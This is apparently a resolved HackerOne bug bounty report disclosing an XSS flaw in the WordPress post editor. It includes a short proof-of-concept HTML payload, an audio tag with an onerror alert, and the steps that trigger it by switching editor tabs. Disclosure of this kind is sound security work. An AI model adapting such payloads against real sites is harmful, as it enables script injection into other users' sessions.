XSS in WordPress
Unknown
Vulnerability Details
Hi there ,
I have identified a WordPress security vulnerability , a potential XSS vulnerability that affects latest version of WordPress .
POC :-
Go to GET *****.wordpress.com/wp-admin/post-new.php
In Text (HTML Field) input , <HTML xmlns: ><audio>
<audio src=wp onerror=alert(0X1)>
Now, Click on Visual Tab , XSS will trigger . (Screenshot attached )
Thanks and please address this issue .
Actions
View on HackerOneReport Stats
- Report ID: 81736
- State: Closed
- Substate: resolved
- Upvotes: 3